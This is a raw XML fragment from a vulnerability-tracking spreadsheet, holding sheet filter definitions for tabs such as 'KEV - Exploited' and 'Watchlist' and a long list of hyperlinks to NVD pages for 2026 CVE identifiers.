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CVEs'!$A$1:$T$1103</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'New Today'!$A$1:$T$1066</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Significant Updates'!$A$1:$T$38</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Added to KEV'!$A$1:$T$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'KEV - Exploited'!$A$1:$T$2</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Critical &amp; High'!$A$1:$T$265</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Watchlist'!$A$1:$T$23</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'Packages (GHSA-OSV)'!$A$1:$T$96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87886" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54734" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62104" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69399" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69865" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70200" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83944" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85889" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92937" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92940" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92941" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92946" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92947" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92953" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92955" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92956" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92960" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85885" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92938" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92948" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45140" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54460" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54617" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54626" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54627" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62101" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62108" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86707" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86709" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86710" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87796" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90822" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90823" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92944" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54053" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54752" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87701" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92934" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92935" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54501" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54618" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92939" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92951" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92957" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54237" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70009" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86863" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92950" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15688" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79752" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92943" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93393" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54670" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54767" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63472" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76949" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82761" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85500" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86533" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88952" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91039" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92860" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45143" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47252" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77903" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88795" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92952" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14850" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15815" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25283" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28326" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54239" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54504" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54519" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54612" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54671" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54916" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77614" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78295" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85130" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86801" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87786" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88792" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88904" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92918" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92970" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92972" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52836" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54343" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54571" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63459" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69197" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77615" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86864" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89036" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89418" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92971" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92987" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19477" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68791" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87963" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92914" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92954" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92985" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92986" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66580" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71538" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92958" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93292" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93426" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54507" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55062" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54580" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54581" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54583" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54597" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54253" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54354" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54451" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56795" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82760" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85077" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86039" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92903" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26950" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54446" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54520" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54596" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76834" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81442" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81475" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81476" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81478" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87935" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92984" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78428" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25282" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-59607" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24073" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24074" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24075" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25278" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25280" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25290" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54692" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81474" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86320" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92838" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93337" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48977" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50158" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53557" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54339" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81546" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45726" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54506" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66618" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66619" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66624" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66625" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66626" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66628" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 